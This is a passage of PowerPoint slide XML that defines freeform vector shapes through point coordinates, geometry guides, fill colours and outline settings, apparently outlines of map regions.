                      <a:pt x="133" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="110"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36337" name="Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4003" y="2789"/>
                <a:ext cx="35" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 35"/>
                  <a:gd name="T1" fmla="*/ 60 h 60"/>
                  <a:gd name="T2" fmla="*/ 11 w 35"/>
                  <a:gd name="T3" fmla="*/ 60 h 60"/>
                  <a:gd name="T4" fmla="*/ 9 w 35"/>
                  <a:gd name="T5" fmla="*/ 58 h 60"/>
                  <a:gd name="T6" fmla="*/ 7 w 35"/>
                  <a:gd name="T7" fmla="*/ 56 h 60"/>
                  <a:gd name="T8" fmla="*/ 6 w 35"/>
                  <a:gd name="T9" fmla="*/ 51 h 60"/>
                  <a:gd name="T10" fmla="*/ 3 w 35"/>
                  <a:gd name="T11" fmla="*/ 42 h 60"/>
                  <a:gd name="T12" fmla="*/ 3 w 35"/>
                  <a:gd name="T13" fmla="*/ 38 h 60"/>
                  <a:gd name="T14" fmla="*/ 3 w 35"/>
                  <a:gd name="T15" fmla="*/ 32 h 60"/>
                  <a:gd name="T16" fmla="*/ 3 w 35"/>
                  <a:gd name="T17" fmla="*/ 26 h 60"/>
                  <a:gd name="T18" fmla="*/ 1 w 35"/>
                  <a:gd name="T19" fmla="*/ 21 h 60"/>
                  <a:gd name="T20" fmla="*/ 2 w 35"/>
                  <a:gd name="T21" fmla="*/ 17 h 60"/>
                  <a:gd name="T22" fmla="*/ 0 w 35"/>
                  <a:gd name="T23" fmla="*/ 15 h 60"/>
                  <a:gd name="T24" fmla="*/ 1 w 35"/>
                  <a:gd name="T25" fmla="*/ 13 h 60"/>
                  <a:gd name="T26" fmla="*/ 4 w 35"/>
                  <a:gd name="T27" fmla="*/ 13 h 60"/>
                  <a:gd name="T28" fmla="*/ 6 w 35"/>
                  <a:gd name="T29" fmla="*/ 10 h 60"/>
                  <a:gd name="T30" fmla="*/ 7 w 35"/>
                  <a:gd name="T31" fmla="*/ 7 h 60"/>
                  <a:gd name="T32" fmla="*/ 8 w 35"/>
                  <a:gd name="T33" fmla="*/ 4 h 60"/>
                  <a:gd name="T34" fmla="*/ 7 w 35"/>
                  <a:gd name="T35" fmla="*/ 0 h 60"/>
                  <a:gd name="T36" fmla="*/ 11 w 35"/>
                  <a:gd name="T37" fmla="*/ 4 h 60"/>
                  <a:gd name="T38" fmla="*/ 16 w 35"/>
                  <a:gd name="T39" fmla="*/ 7 h 60"/>
                  <a:gd name="T40" fmla="*/ 18 w 35"/>
                  <a:gd name="T41" fmla="*/ 10 h 60"/>
                  <a:gd name="T42" fmla="*/ 21 w 35"/>
                  <a:gd name="T43" fmla="*/ 15 h 60"/>
                  <a:gd name="T44" fmla="*/ 23 w 35"/>
                  <a:gd name="T45" fmla="*/ 17 h 60"/>
                  <a:gd name="T46" fmla="*/ 22 w 35"/>
                  <a:gd name="T47" fmla="*/ 20 h 60"/>
                  <a:gd name="T48" fmla="*/ 22 w 35"/>
                  <a:gd name="T49" fmla="*/ 21 h 60"/>
                  <a:gd name="T50" fmla="*/ 26 w 35"/>
                  <a:gd name="T51" fmla="*/ 23 h 60"/>
                  <a:gd name="T52" fmla="*/ 28 w 35"/>
                  <a:gd name="T53" fmla="*/ 29 h 60"/>
                  <a:gd name="T54" fmla="*/ 34 w 35"/>
                  <a:gd name="T55" fmla="*/ 38 h 60"/>
                  <a:gd name="T56" fmla="*/ 35 w 35"/>
                  <a:gd name="T57" fmla="*/ 42 h 60"/>
                  <a:gd name="T58" fmla="*/ 34 w 35"/>
                  <a:gd name="T59" fmla="*/ 47 h 60"/>
                  <a:gd name="T60" fmla="*/ 31 w 35"/>
                  <a:gd name="T61" fmla="*/ 52 h 60"/>
                  <a:gd name="T62" fmla="*/ 28 w 35"/>
                  <a:gd name="T63" fmla="*/ 55 h 60"/>
                  <a:gd name="T64" fmla="*/ 24 w 35"/>
                  <a:gd name="T65" fmla="*/ 58 h 60"/>
                  <a:gd name="T66" fmla="*/ 19 w 35"/>
                  <a:gd name="T67" fmla="*/ 60 h 60"/>
                  <a:gd name="T68" fmla="*/ 14 w 35"/>
                  <a:gd name="T69" fmla="*/ 60 h 6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35"/>
                  <a:gd name="T106" fmla="*/ 0 h 60"/>
                  <a:gd name="T107" fmla="*/ 35 w 35"/>
                  <a:gd name="T108" fmla="*/ 60 h 60"/>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35" h="60">
                    <a:moveTo>
                      <a:pt x="14" y="60"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36338" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4003" y="2789"/>
                <a:ext cx="35" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 35"/>
                  <a:gd name="T1" fmla="*/ 60 h 60"/>
                  <a:gd name="T2" fmla="*/ 11 w 35"/>
                  <a:gd name="T3" fmla="*/ 60 h 60"/>
                  <a:gd name="T4" fmla="*/ 9 w 35"/>
                  <a:gd name="T5" fmla="*/ 58 h 60"/>
                  <a:gd name="T6" fmla="*/ 7 w 35"/>
                  <a:gd name="T7" fmla="*/ 56 h 60"/>
                  <a:gd name="T8" fmla="*/ 6 w 35"/>
                  <a:gd name="T9" fmla="*/ 51 h 60"/>
                  <a:gd name="T10" fmla="*/ 3 w 35"/>
                  <a:gd name="T11" fmla="*/ 42 h 60"/>
                  <a:gd name="T12" fmla="*/ 3 w 35"/>
                  <a:gd name="T13" fmla="*/ 38 h 60"/>
                  <a:gd name="T14" fmla="*/ 3 w 35"/>
                  <a:gd name="T15" fmla="*/ 32 h 60"/>
                  <a:gd name="T16" fmla="*/ 3 w 35"/>
                  <a:gd name="T17" fmla="*/ 26 h 60"/>
                  <a:gd name="T18" fmla="*/ 1 w 35"/>
                  <a:gd name="T19" fmla="*/ 21 h 60"/>
                  <a:gd name="T20" fmla="*/ 2 w 35"/>
                  <a:gd name="T21" fmla="*/ 17 h 60"/>
                  <a:gd name="T22" fmla="*/ 0 w 35"/>
                  <a:gd name="T23" fmla="*/ 15 h 60"/>
                  <a:gd name="T24" fmla="*/ 1 w 35"/>
                  <a:gd name="T25" fmla="*/ 13 h 60"/>
                  <a:gd name="T26" fmla="*/ 4 w 35"/>
                  <a:gd name="T27" fmla="*/ 13 h 60"/>
                  <a:gd name="T28" fmla="*/ 6 w 35"/>
                  <a:gd name="T29" fmla="*/ 10 h 60"/>
                  <a:gd name="T30" fmla="*/ 7 w 35"/>
                  <a:gd name="T31" fmla="*/ 7 h 60"/>
                  <a:gd name="T32" fmla="*/ 8 w 35"/>
                  <a:gd name="T33" fmla="*/ 4 h 60"/>
                  <a:gd name="T34" fmla="*/ 7 w 35"/>
                  <a:gd name="T35" fmla="*/ 0 h 60"/>
                  <a:gd name="T36" fmla="*/ 11 w 35"/>
                  <a:gd name="T37" fmla="*/ 4 h 60"/>
                  <a:gd name="T38" fmla="*/ 16 w 35"/>
                  <a:gd name="T39" fmla="*/ 7 h 60"/>
                  <a:gd name="T40" fmla="*/ 18 w 35"/>
                  <a:gd name="T41" fmla="*/ 10 h 60"/>
                  <a:gd name="T42" fmla="*/ 21 w 35"/>
                  <a:gd name="T43" fmla="*/ 15 h 60"/>
                  <a:gd name="T44" fmla="*/ 23 w 35"/>
                  <a:gd name="T45" fmla="*/ 17 h 60"/>
                  <a:gd name="T46" fmla="*/ 22 w 35"/>
                  <a:gd name="T47" fmla="*/ 20 h 60"/>
                  <a:gd name="T48" fmla="*/ 22 w 35"/>
                  <a:gd name="T49" fmla="*/ 21 h 60"/>
                  <a:gd name="T50" fmla="*/ 26 w 35"/>
                  <a:gd name="T51" fmla="*/ 23 h 60"/>
                  <a:gd name="T52" fmla="*/ 28 w 35"/>
                  <a:gd name="T53" fmla="*/ 29 h 60"/>
                  <a:gd name="T54" fmla="*/ 34 w 35"/>
                  <a:gd name="T55" fmla="*/ 38 h 60"/>
                  <a:gd name="T56" fmla="*/ 35 w 35"/>
                  <a:gd name="T57" fmla="*/ 42 h 60"/>
                  <a:gd name="T58" fmla="*/ 34 w 35"/>
                  <a:gd name="T59" fmla="*/ 47 h 60"/>
                  <a:gd name="T60" fmla="*/ 31 w 35"/>
                  <a:gd name="T61" fmla="*/ 52 h 60"/>
                  <a:gd name="T62" fmla="*/ 28 w 35"/>
                  <a:gd name="T63" fmla="*/ 55 h 60"/>
                  <a:gd name="T64" fmla="*/ 24 w 35"/>
                  <a:gd name="T65" fmla="*/ 58 h 60"/>
                  <a:gd name="T66" fmla="*/ 19 w 35"/>
                  <a:gd name="T67" fmla="*/ 60 h 60"/>
                  <a:gd name="T68" fmla="*/ 14 w 35"/>
                  <a:gd name="T69" fmla="*/ 60 h 6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35"/>
                  <a:gd name="T106" fmla="*/ 0 h 60"/>
                  <a:gd name="T107" fmla="*/ 35 w 35"/>
                  <a:gd name="T108" fmla="*/ 60 h 60"/>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35" h="60">
                    <a:moveTo>
                      <a:pt x="14" y="60"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36339" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3426" y="3139"/>
                <a:ext cx="114" cy="225"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 114"/>
                  <a:gd name="T1" fmla="*/ 65 h 225"/>
                  <a:gd name="T2" fmla="*/ 32 w 114"/>
                  <a:gd name="T3" fmla="*/ 62 h 225"/>
                  <a:gd name="T4" fmla="*/ 36 w 114"/>
                  <a:gd name="T5" fmla="*/ 62 h 225"/>
                  <a:gd name="T6" fmla="*/ 45 w 114"/>
                  <a:gd name="T7" fmla="*/ 58 h 225"/>
                  <a:gd name="T8" fmla="*/ 50 w 114"/>
                  <a:gd name="T9" fmla="*/ 60 h 225"/>
                  <a:gd name="T10" fmla="*/ 49 w 114"/>
                  <a:gd name="T11" fmla="*/ 56 h 225"/>
                  <a:gd name="T12" fmla="*/ 58 w 114"/>
                  <a:gd name="T13" fmla="*/ 51 h 225"/>
                  <a:gd name="T14" fmla="*/ 63 w 114"/>
                  <a:gd name="T15" fmla="*/ 51 h 225"/>
                  <a:gd name="T16" fmla="*/ 62 w 114"/>
                  <a:gd name="T17" fmla="*/ 45 h 225"/>
                  <a:gd name="T18" fmla="*/ 67 w 114"/>
                  <a:gd name="T19" fmla="*/ 44 h 225"/>
                  <a:gd name="T20" fmla="*/ 73 w 114"/>
                  <a:gd name="T21" fmla="*/ 40 h 225"/>
                  <a:gd name="T22" fmla="*/ 70 w 114"/>
                  <a:gd name="T23" fmla="*/ 36 h 225"/>
                  <a:gd name="T24" fmla="*/ 72 w 114"/>
                  <a:gd name="T25" fmla="*/ 34 h 225"/>
                  <a:gd name="T26" fmla="*/ 75 w 114"/>
                  <a:gd name="T27" fmla="*/ 31 h 225"/>
                  <a:gd name="T28" fmla="*/ 74 w 114"/>
                  <a:gd name="T29" fmla="*/ 22 h 225"/>
                  <a:gd name="T30" fmla="*/ 76 w 114"/>
                  <a:gd name="T31" fmla="*/ 22 h 225"/>
                  <a:gd name="T32" fmla="*/ 80 w 114"/>
                  <a:gd name="T33" fmla="*/ 26 h 225"/>
                  <a:gd name="T34" fmla="*/ 87 w 114"/>
                  <a:gd name="T35" fmla="*/ 19 h 225"/>
                  <a:gd name="T36" fmla="*/ 89 w 114"/>
                  <a:gd name="T37" fmla="*/ 13 h 225"/>
                  <a:gd name="T38" fmla="*/ 89 w 114"/>
                  <a:gd name="T39" fmla="*/ 5 h 225"/>
                  <a:gd name="T40" fmla="*/ 93 w 114"/>
                  <a:gd name="T41" fmla="*/ 0 h 225"/>
                  <a:gd name="T42" fmla="*/ 99 w 114"/>
                  <a:gd name="T43" fmla="*/ 7 h 225"/>
                  <a:gd name="T44" fmla="*/ 104 w 114"/>
                  <a:gd name="T45" fmla="*/ 11 h 225"/>
                  <a:gd name="T46" fmla="*/ 108 w 114"/>
                  <a:gd name="T47" fmla="*/ 30 h 225"/>
                  <a:gd name="T48" fmla="*/ 110 w 114"/>
                  <a:gd name="T49" fmla="*/ 41 h 225"/>
                  <a:gd name="T50" fmla="*/ 114 w 114"/>
                  <a:gd name="T51" fmla="*/ 50 h 225"/>
                  <a:gd name="T52" fmla="*/ 114 w 114"/>
                  <a:gd name="T53" fmla="*/ 54 h 225"/>
                  <a:gd name="T54" fmla="*/ 109 w 114"/>
